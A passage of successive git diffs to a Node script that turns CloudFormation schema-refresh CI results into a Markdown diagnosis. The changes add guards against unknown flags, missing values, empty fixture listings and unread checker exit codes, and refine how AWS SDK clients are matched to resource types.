- * `vp test run property-coverage`, whose red is reached by an ordinary schema
- * ADDITION re-adding a property some provider wrote off.
- * `--skipped-log` is the tail of the refresh's own output,
+ * watched succeed. `--failed-checks` is the comma-separated list of CI checks
+ * that came back red — every one of them fixture-driven, and every one reached
+ * by an ordinary schema ADDITION. `--skipped-log` is the tail of the refresh's
+ * own output,
  * listing the types the public bundle does not carry.
  *
  * Emits Markdown on stdout and always exits 0 — a diagnosis that fails must
@@ -1414,8 +1414,43 @@ export function loadDeclaredProperties(repoRoot = REPO_ROOT) {
   return parseDeclaredProperties(readFileSync(generatedPath, 'utf8'));
 }
 
+/**
+ * Every flag this script accepts, in the order the synopsis lists them.
+ *
+ * EXPORTED so the header docblock and the argument readers cannot drift apart:
+ * the synopsis documented `--property-coverage-rc` for two rounds after
+ * `--failed-checks` replaced it, and with no unknown-flag guard, following the
+ * script's own documented usage produced
+ * "Nothing in this refresh needs a decision — additions only" over a red
+ * `property-coverage` — the verdict six rounds went into closing, reached
+ * through the documentation.
+ */
+export const KNOWN_FLAGS = [
+  '--nested-key-log',
+  '--nested-key-rc',
+  '--failed-checks',
+  '--skipped-log',
+];
+
 function main() {
   const args = process.argv.slice(2);
+
+  // An unrecognised flag must NOT silently fall through: every reader's
+  // absent-flag arm is the permissive one (`''` for the logs, "nothing failed"
+  // for the check list), so a typo, a retired flag or a single-dash spelling
+  // all render as clean. Same guard, and the same reasoning, as the sibling
+  // producer `refresh-cfn-schemas.mjs` carries.
+  const unknown = args.filter(
+    (a) =>
+      a.startsWith('-') &&
+      !KNOWN_FLAGS.some((flag) => a === flag || a.startsWith(`${flag}=`))
+  );
+  if (unknown.length > 0) {
+    throw new Error(
+      `unrecognized flag(s): ${unknown.join(', ')} — known flags are ${KNOWN_FLAGS.join(', ')}. ` +
+        'Refusing to report from an invocation this script did not understand.'
+    );
+  }
   // The third reader, and it was the last one still silent on both counts: a
   // flag with no value AND a path that does not exist both returned `''`.
   // `--nested-key-log` is rescued by its `--nested-key-rc` companion, but

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -592,8 +592,9 @@ export function parseDeclaredProperties(generatedSource) {
  *
  * A check absent from this table still gets a section — naming it and saying
  * there is no guidance beats the silence that shipped for six rounds.
+ *
+ * @type {Record<string, string[]>}
  */
-/** @type {Record<string, string[]>} */
 export const CHECK_GUIDANCE = {
   'property-coverage': [
     'Most often AWS RE-ADDED a property a provider had written off with a',
@@ -1433,6 +1434,40 @@ export const KNOWN_FLAGS = [
   '--skipped-log',
 ];
 
+/**
+ * Refuse a fixture listing too small to have been produced by a real refresh.
+ *
+ * The LAST input in this file without a floor, and the same class as every
+ * other one: `parseDeclaredProperties` throws on zero types and on a
+ * recognised-entry shortfall, `loadDeclaredProperties` refuses a missing
+ * module, `parseNestedKeyDivergences` counts a shortfall, the per-fixture
+ * `catch` counts `unreadable` — while the directory listing went straight in.
+ * An empty one yields empty removals AND empty additions, which renders as
+ * "additions only".
+ *
+ * The bound is the DECLARED type count rather than a constant: the two move
+ * together (134 and 134 today), a hand-picked number goes stale, and the
+ * producer never deletes a fixture. Half is slack for a genuine mid-refresh
+ * state, not a target.
+ *
+ * @param {number} fixtureCount
+ * @param {number} declaredCount
+ */
+export function assertFixtureFloor(fixtureCount, declaredCount) {
+  if (fixtureCount === 0) {
+    throw new Error(
+      'no schema fixtures found — refusing to report "nothing needs a decision" from a ' +
+        'directory this run never read.'
+    );
+  }
+  if (declaredCount > 0 && fixtureCount * 2 < declaredCount) {
+    throw new Error(
+      `only ${fixtureCount} schema fixtures against ${declaredCount} declared types — ` +
+        'refusing to report from a listing this far short of the coverage table.'
+    );
+  }
+}
+
 function main() {
   const args = process.argv.slice(2);
 
@@ -1562,8 +1597,12 @@ function main() {
   // is still listed there — which is exactly the "now bogus" condition.
   const declared = loadDeclaredProperties();
 
+  const fixtureFiles = readdirSync(FIXTURES_DIR).filter(
+    (f) => f.endsWith('.json') && !f.startsWith('_')
+  );
+  assertFixtureFloor(fixtureFiles.length, declared.size);
   const { removed, writableAdded, readOnlyAddedCount, unreadable } = collectFixtureDeltas({
-    files: readdirSync(FIXTURES_DIR).filter((f) => f.endsWith('.json') && !f.startsWith('_')),
+    files: fixtureFiles,
     committedOf: (file) => committedVersion(`tests/fixtures/cfn-schemas/${file}`),
     currentOf: (file) => readFileSync(join(FIXTURES_DIR, file), 'utf8'),
     providerFiles,

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -53,9 +53,9 @@ const REPO_ROOT = join(__dirname, '..');
 /**
  * @typedef {import('./diagnose-schema-refresh.d.mts').NestedKeyDivergence} NestedKeyDivergence
  * @typedef {import('./diagnose-schema-refresh.d.mts').SdkLagRow} SdkLagRow
- * @typedef {{client: string, modelled: boolean, version?: string, consulted?: string[]}} SdkEvidence
- * @typedef {{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, SdkEvidence | undefined>, renameCandidates?: Record<string, string[]>, providerPath?: string}} RemovedEntry
- * @typedef {{resourceType: string, properties: string[]}} AddedEntry
+ * @typedef {import('./diagnose-schema-refresh.d.mts').SdkEvidence} SdkEvidence
+ * @typedef {import('./diagnose-schema-refresh.d.mts').RemovedEntry} RemovedEntry
+ * @typedef {import('./diagnose-schema-refresh.d.mts').AddedEntry} AddedEntry
  */
 
 
@@ -370,19 +370,32 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
  * Falls back to EVERY row rather than to none when nothing matches: the caller
  * renders an absent type as "UNKNOWN, not ruled out", and a silently empty
  * answer would read as ruled out. The narrowing is a noise reduction, not a
- * correctness claim.
+ * correctness claim — which is why `matched` is REPORTED rather than left for a
+ * caller to re-derive. A caller that re-derived it read the suffix test as
+ * proof and told the reader to discount a live, applicable lag on the 13
+ * registered types whose client is not named after their service segment
+ * (`AWS::Events::Rule` is served by `@aws-sdk/client-eventbridge`,
+ * `AWS::Logs::LogGroup` by `@aws-sdk/client-cloudwatch-logs`). `false` here
+ * means "this narrowing found nothing to go on", never "wrong client".
  *
  * @param {string} resourceType
  * @param {Array<{client: string, version: string}>} rows
- * @returns {Array<{client: string, version: string}>}
+ * @returns {Array<{client: string, version: string, matched: boolean}>}
  */
 export function clientsForType(resourceType, rows) {
   const service = (resourceType.split('::')[1] ?? '').toLowerCase();
-  if (!service) return rows;
-  const matched = rows.filter(
-    (r) => r.client.replace('@aws-sdk/client-', '').replace(/-/g, '') === service
-  );
-  return matched.length > 0 ? matched : rows;
+  const matched = service
+    ? rows.filter((r) => r.client.replace('@aws-sdk/client-', '').replace(/-/g, '') === service)
+    : [];
+  if (matched.length > 0) return matched.map((r) => ({ ...r, matched: true }));
+  // A provider importing exactly ONE client leaves nothing for the name test to
+  // disambiguate — that client IS the type's own, whatever it is called. This
+  // arm is what keeps the hedge off the services whose client is named
+  // differently: measured over the 134 registered types, the name test matches
+  // 119, this arm settles 10 more (`AWS::Events::Rule` /
+  // `@aws-sdk/client-eventbridge` among them), and 3 are genuinely ambiguous —
+  // a provider importing several clients, none named for the service.
+  return rows.map((r) => ({ ...r, matched: rows.length === 1 }));
 }
 
 /**
@@ -690,12 +703,14 @@ export function renderDiagnosis({
     lines.push(
       '### The nested-key check FAILED in a mode this report cannot read',
       '',
-      'It reported a failure and printed no finding line this parser recognises.',
-      'That is one of its non-divergence refusals (a stale `NESTED_KEY_ALLOW_LIST`,',
-      '`segmentRenames` or `terminalRenames` entry — each a real decision, and each',
-      'exactly what a schema refresh causes), a crash, or a change to its output',
-      'format. **Read the failing job log before merging**; the sections below are',
-      'still accurate for everything other than nested keys.',
+      'It failed, or dropped findings, without printing lines this parser could',
+      'read. That is one of its non-divergence refusals (a stale',
+      '`NESTED_KEY_ALLOW_LIST`, `segmentRenames` or `terminalRenames` entry — each a',
+      'real decision, and each exactly what a schema refresh causes), a change to',
+      'its output format, or a checker that never ran at all (a missing task, a',
+      'crash, an OOM kill — the case its exit code is the only evidence of).',
+      '**Read the failing job log before merging**; the sections below are still',
+      'accurate for everything other than nested keys.',
       '',
       '```bash',
       'vp run audit:nested-key-coverage:check',
@@ -928,13 +943,15 @@ function divergenceProcedure(divergences, sdkLag) {
     // report that says nothing reads as ruled out.
     lagLines.push('', '**Installed vs published, for the divergent types above:**', '');
     for (const l of lags) {
-      // `clientsForType` falls back to every imported client when none matches
-      // the type's service, so a row can name a client that does not serve the
-      // type at all. Saying "ruled out here" over `@aws-sdk/client-sts` would
-      // attribute a verdict to the wrong service.
-      const own = l.client.replace('@aws-sdk/client-', '').replace(/-/g, '') ===
-        (l.resourceType.split('::')[1] ?? '').toLowerCase();
-      const scope = own ? 'here' : "for that client, which is not the type's own";
+      // Read, never re-derived. `clientsForType` falls back to every imported
+      // client when none matches the type's service, so a row CAN name a client
+      // that does not serve the type — but re-computing that test here turned a
+      // noise-reduction heuristic into a correctness claim and told the reader
+      // to discount a live lag on the 13 types whose client is not named after
+      // their service (`AWS::Events::Rule` / `@aws-sdk/client-eventbridge`).
+      // A false flag means the narrowing found nothing to go on, so the
+      // qualifier hedges rather than denies.
+      const scope = l.matched === false ? 'for that client, which may not be the type’s own' : 'here';
       lagLines.push(
         l.behind
           ? `- ${renderName(l.resourceType)} — \`${l.client}\` is ${l.installed}, npm ` +
@@ -1018,10 +1035,10 @@ function committedVersion(relPath) {
  * @param {Array<{resourceType: string, bucket: string}>} divergences
  * @param {(resourceType: string) => Array<{client: string, version: string}>} clientsFor
  * @param {(client: string, installed: string) => {installed: string, latest: string, behind: boolean} | undefined} [versionLag]
- * @returns {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>}
+ * @returns {SdkLagRow[]}
  */
 export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag) {
-  /** @type {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>} */
+  /** @type {SdkLagRow[]} */
   const out = [];
   /** @type {Map<string, {installed: string, latest: string, behind: boolean} | undefined>} */
   const byClient = new Map();
@@ -1030,7 +1047,10 @@ export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag)
     // A case divergence needs no judgement — the SDK models the key under
     // another capitalisation — so it never justifies a network call.
     if (d.bucket === 'case-divergence') continue;
-    for (const { client, version } of clientsForType(d.resourceType, clientsFor(d.resourceType))) {
+    for (const { client, version, matched } of clientsForType(
+      d.resourceType,
+      clientsFor(d.resourceType)
+    )) {
       if (!byClient.has(client)) byClient.set(client, versionLag(client, version));
       const lag = byClient.get(client);
       // One row per (type, client): several divergences routinely land on the
@@ -1038,7 +1058,7 @@ export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag)
       const key = `${d.resourceType}\u0000${client}`;
       if (lag && !emitted.has(key)) {
         emitted.add(key);
-        out.push({ resourceType: d.resourceType, client, ...lag });
+        out.push({ resourceType: d.resourceType, client, matched, ...lag });
       }
     }
   }
@@ -1133,11 +1153,20 @@ function main() {
     }
   }
 
+  // An UNREADABLE status is not a successful one: a mistyped value used to
+  // return 0 — "the checker succeeded" — silently restoring the behaviour where
+  // a checker that never ran renders as "additions only".
+  //
+  // An ABSENT flag is different and stays 0: this script is also run by hand
+  // (the runbook's `vp run audit:nested-key-coverage:check` loop), and refusing
+  // every manual invocation is not a safety property. The risk the absent arm
+  // carries — the WORKFLOW dropping the flag — is guarded where the evidence
+  // still exists, by the workflow test asserting it passes the variable.
   const readNumArg = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
     if (i === -1 || i + 1 >= args.length) return 0;
     const n = Number(args[i + 1]);
-    return Number.isFinite(n) ? n : 0;
+    return Number.isFinite(n) ? n : 1;
   };
   const nestedKey = parseNestedKeyDivergences(
     readArg('--nested-key-log'),

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -1316,7 +1316,13 @@ export function collectFixtureDeltas({
       let resourceType;
       try {
         delta = comparePropertySets(committed, currentOf(file));
-        resourceType = JSON.parse(committed).resourceType ?? file;
+        // The filename stem converted back, never the raw stem: it is hyphenated
+      // and `renderName` rejects hyphens, so the fallback rendered
+      // `**[name rejected]**` as the heading — the same shape as the two render
+      // sites rounds 8 and 9 fixed. The declared-property lookup misses either
+      // way, but a legible heading says which type it missed for.
+      resourceType =
+        JSON.parse(committed).resourceType ?? file.replace(/\.json$/, '').replace(/-/g, '::');
       } catch {
         // An unparseable side is the refresh's problem, not the report's — but it
         // is COUNTED, because a type that vanishes here vanishes from the removal
@@ -1436,9 +1442,17 @@ function main() {
   // every manual invocation is not a safety property. The risk the absent arm
   // carries — the WORKFLOW dropping the flag — is guarded where the evidence
   // still exists, by the workflow test asserting it passes the variable.
+  // A flag PRESENT with no value is unreadable, not empty — the same
+  // distinction `readNumArg` draws, and its twin here fails open the same way:
+  // an empty list reads as "nothing failed".
   const readArgValue = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
-    return i === -1 || i + 1 >= args.length ? '' : args[i + 1];
+    if (i === -1) return '';
+    const raw = args[i + 1];
+    if (raw === undefined) {
+      throw new Error(`${flag} was given with no value — refusing to report from an unread list.`);
+    }
+    return raw;
   };
   const readNumArg = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -51,13 +51,22 @@ const __dirname = dirname(fileURLToPath(import.meta.url));
 const REPO_ROOT = join(__dirname, '..');
 
 /**
+ * @typedef {import('./diagnose-schema-refresh.d.mts').NestedKeyDivergence} NestedKeyDivergence
+ * @typedef {import('./diagnose-schema-refresh.d.mts').SdkLagRow} SdkLagRow
+ * @typedef {{client: string, modelled: boolean, version?: string, consulted?: string[]}} SdkEvidence
+ * @typedef {{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, SdkEvidence | undefined>, renameCandidates?: Record<string, string[]>, providerPath?: string}} RemovedEntry
+ * @typedef {{resourceType: string, properties: string[]}} AddedEntry
+ */
+
+
+/**
  * Every way `gen-nested-key-coverage.ts --check` announces a failure.
  *
  * Both spellings are load-bearing: `FAIL` prefixes its four blocking verdicts
  * (divergences, and the three stale-list refusals) and `failed` prefixes the
  * crash path. A run that says either of these and yields no parsed finding must
  * never render as clean. Fenced against the producer by
- * `tests/unit/scripts/cfn-schema-refresh-workflow.test.ts`, which greps both
+ * `tests/unit/scripts/diagnose-schema-refresh.test.ts`, which greps both
  * spellings out of `gen-nested-key-coverage.ts` — nothing else joins the two
  * files, and a reword there would otherwise make this pattern silently inert.
  */
@@ -116,10 +125,17 @@ export function comparePropertySets(committedJson, refreshedJson) {
  * reported as `unparsed`: the caller renders a section naming it rather than
  * either throwing the diagnosis away or claiming the refresh is clean.
  *
+ * The EXIT CODE is the other half, and text alone was not enough: an empty log,
+ * a `task not found`, and an OOM kill all carry no announcement, so all three
+ * rendered "Nothing in this refresh needs a decision — additions only" over a
+ * checker that never ran.
+ *
  * @param {string} checkOutput
+ * @param {number} [exitCode] the checker's own status; non-zero with nothing
+ *   parsed is a failure however it worded itself
  * @returns {{divergences: Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>, unparsedFailure: boolean}}
  */
-export function parseNestedKeyDivergences(checkOutput) {
+export function parseNestedKeyDivergences(checkOutput, exitCode = 0) {
   /** @type {Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>} */
   const divergences = [];
   for (const raw of checkOutput.split('\n')) {
@@ -138,8 +154,23 @@ export function parseNestedKeyDivergences(checkOutput) {
       detail: m[4] ?? '',
     });
   }
+  // A SHORTFALL, not only zero — the same correction `parseDeclaredProperties`
+  // needed one round earlier, in the sibling parser, for the same reason: with
+  // the flag gated on `divergences.length === 0`, a producer change touching
+  // SOME lines drops them silently and the report renders the survivors in a
+  // confident tone. Measured on a five-finding log with three deviating rows:
+  // two parsed, three dropped, no warning.
+  //
+  // The loose count is deliberately looser than the strict one — it asks "was
+  // this line TRYING to be a finding", which is what makes a shortfall visible
+  // at all. A line the loose pattern also misses is invisible to both, and that
+  // residual is what `--nested-key-rc` covers from the other side.
+  const looksLikeFinding = checkOutput
+    .split('\n')
+    .filter((raw) => /^AWS::\S+:/.test(raw.trim())).length;
   const unparsedFailure =
-    divergences.length === 0 && NESTED_KEY_FAILURE_RE.test(checkOutput);
+    divergences.length < looksLikeFinding ||
+    (divergences.length === 0 && (exitCode !== 0 || NESTED_KEY_FAILURE_RE.test(checkOutput)));
   return { divergences, unparsedFailure };
 }
 
@@ -328,42 +359,6 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
 }
 
 /**
- * Whether the installed SDK client is behind what npm publishes.
- *
- * This settles ONE branch of the divergence decision outright: if the installed
- * client is already the latest, "the SDK merely lags the service" is eliminated
- * and the remaining reading is that the service genuinely lacks the member.
- * When it IS behind, the honest answer is "bump and re-check" — NOT "bumping
- * would fix it", which cannot be answered by a name lookup. Measured while
- * building this: the four live `AWS::Glue::Connection` divergences carry names
- * that ARE present in both the installed and the latest client, because the
- * checker's finding is about a specific INTERFACE's members, not about the name
- * existing somewhere. A grep-level "the newer SDK has it" would have
- * contradicted the checker and been wrong.
- *
- * Network-dependent by nature, so every failure degrades to `undefined` and the
- * caller simply says nothing — a diagnosis must never fail the job it describes.
- *
- * @param {string} client
- * @param {string | undefined} installed
- * @param {(pkg: string) => string} [viewLatest] injectable for tests
- * @returns {{installed: string, latest: string, behind: boolean} | undefined}
- */
-/**
- * Every AWS SDK client a provider imports, with its installed version.
- *
- * Split out of {@link sdkModelsMember} because the version-lag question has no
- * member to look up: the caller wants "which clients could this type's provider
- * be lagging on", and asking `sdkModelsMember` with a name that matches nothing
- * answered with `consulted[0]` — the FIRST import, which is right only by
- * coincidence on a provider importing several (17 of 78 serve more than one
- * type, and `ec2-provider.ts` imports several clients).
- *
- * @param {string | undefined} providerRelPath
- * @param {string} [repoRoot]
- * @returns {Array<{client: string, version: string}>}
- */
-/**
  * The imported clients that plausibly serve a resource type, best-effort.
  *
  * A provider imports more than the service it provisions — `@aws-sdk/client-sts`
@@ -390,6 +385,20 @@ export function clientsForType(resourceType, rows) {
   return matched.length > 0 ? matched : rows;
 }
 
+/**
+ * Every AWS SDK client a provider imports, with its installed version.
+ *
+ * Split out of {@link sdkModelsMember} because the version-lag question has no
+ * member to look up: the caller wants "which clients could this type's provider
+ * be lagging on", and asking `sdkModelsMember` with a name that matches nothing
+ * answered with `consulted[0]` — the FIRST import, which is right only by
+ * coincidence on a provider importing several (17 of 78 serve more than one
+ * type, and `ec2-provider.ts` imports several clients).
+ *
+ * @param {string | undefined} providerRelPath
+ * @param {string} [repoRoot]
+ * @returns {Array<{client: string, version: string}>}
+ */
 export function sdkClientVersions(providerRelPath, repoRoot = REPO_ROOT) {
   if (!providerRelPath) return [];
   const abs = join(repoRoot, providerRelPath);
@@ -417,6 +426,28 @@ export function sdkClientVersions(providerRelPath, repoRoot = REPO_ROOT) {
   return out;
 }
 
+/**
+ * Whether the installed SDK client is behind what npm publishes.
+ *
+ * This settles ONE branch of the divergence decision outright: if the installed
+ * client is already the latest, "the SDK merely lags the service" is eliminated
+ * and the remaining reading is that the service genuinely lacks the member.
+ * When it IS behind, the honest answer is "bump and re-check" — NOT "bumping
+ * would fix it", which cannot be answered by a name lookup. Measured while
+ * building this: the four live `AWS::Glue::Connection` divergences carry names
+ * that ARE present in both the installed and the latest client, because the
+ * checker's finding is about a specific INTERFACE's members, not about the name
+ * existing somewhere. A grep-level "the newer SDK has it" would have
+ * contradicted the checker and been wrong.
+ *
+ * Network-dependent by nature, so every failure degrades to `undefined` and the
+ * caller simply says nothing — a diagnosis must never fail the job it describes.
+ *
+ * @param {string} client
+ * @param {string | undefined} installed
+ * @param {(pkg: string) => string} [viewLatest] injectable for tests
+ * @returns {{installed: string, latest: string, behind: boolean} | undefined}
+ */
 export function sdkVersionLag(client, installed, viewLatest = defaultViewLatest) {
   if (!installed) return undefined;
   let latest;
@@ -533,11 +564,12 @@ export function parseDeclaredProperties(generatedSource) {
  * accepts that risk.
  *
  * @param {object} input
- * @param {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, {client: string, modelled: boolean, version?: string} | undefined>, renameCandidates?: Record<string, string[]>, providerPath?: string}>} input.removed
- * @param {Array<{resourceType: string, properties: string[]}>} input.writableAdded
+ * @param {RemovedEntry[]} input.removed
+ * @param {AddedEntry[]} input.writableAdded
  * @param {number} [input.readOnlyAddedCount]
- * @param {{client: string, resourceType: string, installed: string, latest: string, behind: boolean}} [input.sdkLag]
- * @param {Array<{resourceType: string, bucket: string, line: string}>} input.divergences
+ * @param {SdkLagRow[]} [input.sdkLag]
+ * @param {boolean} [input.nestedKeyUnparsed]
+ * @param {NestedKeyDivergence[]} input.divergences
  * @param {string[]} input.skipped
  * @returns {string}
  */
@@ -839,7 +871,7 @@ export function renderDetail(text) {
  * saying what to run has not handed the work over, it has handed over a
  * question. Each line is something the reader can paste.
  *
- * @param {Array<{resourceType: string, properties: string[]}>} removed
+ * @param {RemovedEntry[]} removed
  * @returns {string[]}
  */
 function removedProcedure(removed) {
@@ -876,7 +908,8 @@ function removedProcedure(removed) {
  * The steps that settle a nested-key divergence, including the one question the
  * evidence cannot answer on its own: whether the installed SDK simply lags.
  *
- * @param {Array<{resourceType: string, bucket: string, line: string}>} divergences
+ * @param {NestedKeyDivergence[]} divergences
+ * @param {SdkLagRow[]} [sdkLag]
  * @returns {string[]}
  */
 function divergenceProcedure(divergences, sdkLag) {
@@ -884,22 +917,34 @@ function divergenceProcedure(divergences, sdkLag) {
   /** @type {string[]} */
   const lagLines = [];
   const lags = sdkLag ?? [];
-  if (hasMissing && lags.length > 0) {
+  if (hasMissing) {
     // One line per (type, client) rather than one line for the whole section.
     // A single line covering "the first divergent type" left every other
     // divergence's SDK-lag reading unstated while reading like a verdict, and
     // the client it named came from the provider's FIRST import.
+    // Emitted even when EVERY lookup failed (npm unreachable from CI is the
+    // ordinary way that happens). Gating the whole block on having rows meant
+    // the report went silent about SDK lag exactly when it knew least, and a
+    // report that says nothing reads as ruled out.
     lagLines.push('', '**Installed vs published, for the divergent types above:**', '');
     for (const l of lags) {
+      // `clientsForType` falls back to every imported client when none matches
+      // the type's service, so a row can name a client that does not serve the
+      // type at all. Saying "ruled out here" over `@aws-sdk/client-sts` would
+      // attribute a verdict to the wrong service.
+      const own = l.client.replace('@aws-sdk/client-', '').replace(/-/g, '') ===
+        (l.resourceType.split('::')[1] ?? '').toLowerCase();
+      const scope = own ? 'here' : "for that client, which is not the type's own";
       lagLines.push(
         l.behind
           ? `- ${renderName(l.resourceType)} — \`${l.client}\` is ${l.installed}, npm ` +
-            `publishes ${l.latest}. The SDK-lag reading is LIVE here: bump and re-check ` +
+            `publishes ${l.latest}. The SDK-lag reading is LIVE ${scope}: bump and re-check ` +
             'before allow-listing anything.'
           : `- ${renderName(l.resourceType)} — \`${l.client}\` is ${l.installed}, which is ` +
-            'current, so the SDK-lag reading is ruled out here.'
+            `current, so the SDK-lag reading is ruled out ${scope}.`
       );
     }
+    if (lags.length === 0) lagLines.push('- Nothing could be read.');
     lagLines.push(
       '',
       'A type absent from that list is one whose client could not be read — its',
@@ -956,6 +1001,50 @@ function committedVersion(relPath) {
   }
 }
 
+/**
+ * The version-lag rows for a set of divergences, one per (type, client).
+ *
+ * Extracted from `main()` because everything here was reachable only through
+ * it, and `main()` has no unit coverage: the composition of
+ * {@link clientsForType} with {@link sdkClientVersions}, the per-client memo,
+ * the de-duplication, and the `case-divergence` skip were all unfalsifiable
+ * while each PIECE was pinned. Two review rounds found real defects in exactly
+ * this code (the first-import client, then an unrelated `client-sts` row), both
+ * by running the script rather than by a test.
+ *
+ * Both collaborators are injected so a test needs no network: `npm view` is the
+ * only outbound call in this file and it lives behind `versionLag`.
+ *
+ * @param {Array<{resourceType: string, bucket: string}>} divergences
+ * @param {(resourceType: string) => Array<{client: string, version: string}>} clientsFor
+ * @param {(client: string, installed: string) => {installed: string, latest: string, behind: boolean} | undefined} [versionLag]
+ * @returns {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>}
+ */
+export function buildSdkLag(divergences, clientsFor, versionLag = sdkVersionLag) {
+  /** @type {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>} */
+  const out = [];
+  /** @type {Map<string, {installed: string, latest: string, behind: boolean} | undefined>} */
+  const byClient = new Map();
+  const emitted = new Set();
+  for (const d of divergences) {
+    // A case divergence needs no judgement — the SDK models the key under
+    // another capitalisation — so it never justifies a network call.
+    if (d.bucket === 'case-divergence') continue;
+    for (const { client, version } of clientsForType(d.resourceType, clientsFor(d.resourceType))) {
+      if (!byClient.has(client)) byClient.set(client, versionLag(client, version));
+      const lag = byClient.get(client);
+      // One row per (type, client): several divergences routinely land on the
+      // same type, and repeating its row reads as several findings.
+      const key = `${d.resourceType}\u0000${client}`;
+      if (lag && !emitted.has(key)) {
+        emitted.add(key);
+        out.push({ resourceType: d.resourceType, client, ...lag });
+      }
+    }
+  }
+  return out;
+}
+
 function main() {
   const args = process.argv.slice(2);
   const readArg = (/** @type {string} */ flag) => {
@@ -985,9 +1074,9 @@ function main() {
       : ''
   );
 
-  /** @type {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk: Record<string, {client: string, modelled: boolean} | undefined>}>} */
+  /** @type {RemovedEntry[]} */
   const removed = [];
-  /** @type {Array<{resourceType: string, properties: string[]}>} */
+  /** @type {AddedEntry[]} */
   const writableAdded = [];
   let readOnlyAddedCount = 0;
 
@@ -1014,7 +1103,7 @@ function main() {
     if (actionable.length > 0) {
       /** @type {Record<string, string[]>} */
       const candidates = {};
-      /** @type {Record<string, {client: string, modelled: boolean, version?: string} | undefined>} */
+      /** @type {Record<string, SdkEvidence | undefined>} */
       const sdk = {};
       /** @type {Record<string, string[]>} */
       const renameCandidates = {};
@@ -1044,7 +1133,16 @@ function main() {
     }
   }
 
-  const nestedKey = parseNestedKeyDivergences(readArg('--nested-key-log'));
+  const readNumArg = (/** @type {string} */ flag) => {
+    const i = args.indexOf(flag);
+    if (i === -1 || i + 1 >= args.length) return 0;
+    const n = Number(args[i + 1]);
+    return Number.isFinite(n) ? n : 0;
+  };
+  const nestedKey = parseNestedKeyDivergences(
+    readArg('--nested-key-log'),
+    readNumArg('--nested-key-rc')
+  );
   const divergences = nestedKey.divergences;
   const skipped = readArg('--skipped-log')
     .split('\n')
@@ -1056,29 +1154,7 @@ function main() {
   // first import. Each distinct client is asked once; the failure of any single
   // lookup is silent by construction and shows up as an absent row, which the
   // rendered section names as UNKNOWN rather than ruled out.
-  /** @type {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>} */
-  const sdkLag = [];
-  /** @type {Map<string, {installed: string, latest: string, behind: boolean} | undefined>} */
-  const lagByClient = new Map();
-  const emitted = new Set();
-  for (const d of divergences) {
-    if (d.bucket === 'case-divergence') continue;
-    const rows = clientsForType(
-      d.resourceType,
-      sdkClientVersions(providerFiles.get(d.resourceType))
-    );
-    for (const { client, version } of rows) {
-      if (!lagByClient.has(client)) lagByClient.set(client, sdkVersionLag(client, version));
-      const lag = lagByClient.get(client);
-      // One row per (type, client): several divergences routinely land on the
-      // same type, and repeating its row reads as several findings.
-      const key = `${d.resourceType}\u0000${client}`;
-      if (lag && !emitted.has(key)) {
-        emitted.add(key);
-        sdkLag.push({ resourceType: d.resourceType, client, ...lag });
-      }
-    }
-  }
+  const sdkLag = buildSdkLag(divergences, (t) => sdkClientVersions(providerFiles.get(t)));
 
   process.stdout.write(
     renderDiagnosis({

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -844,7 +844,11 @@ export function renderDiagnosis(input) {
     // one is a row in `CHECK_GUIDANCE` and a line in the workflow.
     lines.push('### CI checks that FAILED — a decision is needed', '');
     for (const check of failedChecks) {
-      const guidance = CHECK_GUIDANCE[check];
+      // `Object.hasOwn`, not a bare lookup: a plain object literal answers for
+      // `constructor` / `toString` / `valueOf` with a FUNCTION, which the
+      // spread below cannot iterate — collapsing the whole diagnosis to the
+      // generic failure line rather than rendering an unknown check.
+      const guidance = Object.hasOwn(CHECK_GUIDANCE, check) ? CHECK_GUIDANCE[check] : undefined;
       // `renderKey`, not `renderName`: a task name carries hyphens and
       // `renderName`'s class excludes them, so every heading rendered as the
       // rejection placeholder — the section that exists to say WHICH check
@@ -1379,7 +1383,7 @@ export function collectFixtureDeltas({
     if (delta.writableAdded.length > 0) {
       writableAdded.push({ resourceType, properties: delta.writableAdded });
     }
-    }
+  }
 
   return { removed, writableAdded, readOnlyAddedCount, unreadable };
 }
@@ -1431,8 +1435,15 @@ function main() {
    * fabricated a failed check named `-property-coverage`.
    */
   const rawArg = (/** @type {string} */ flag) => {
+    // BOTH spellings take the dash test. The glued branch returned early and
+    // skipped it, so `--failed-checks=-property-coverage` fabricated exactly
+    // the check the space-form guard was written to kill — the two halves were
+    // added to this function in the same round and never crossed.
     const glued = args.find((a) => a.startsWith(`${flag}=`));
-    if (glued !== undefined) return glued.slice(flag.length + 1);
+    if (glued !== undefined) {
+      const value = glued.slice(flag.length + 1);
+      return /^-/.test(value) ? null : value;
+    }
     const i = args.indexOf(flag);
     if (i === -1) return undefined;
     const value = args[i + 1];

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -624,16 +624,26 @@ export const CHECK_GUIDANCE = {
   ],
   'fixture-consumer-tests': [
     'A unit test that reads the schema fixtures directly and asserts something',
-    'about their contents — a mutually-exclusive-properties rule naming a',
-    'property that is gone, or an ECS subfield list the capture no longer',
-    'matches.',
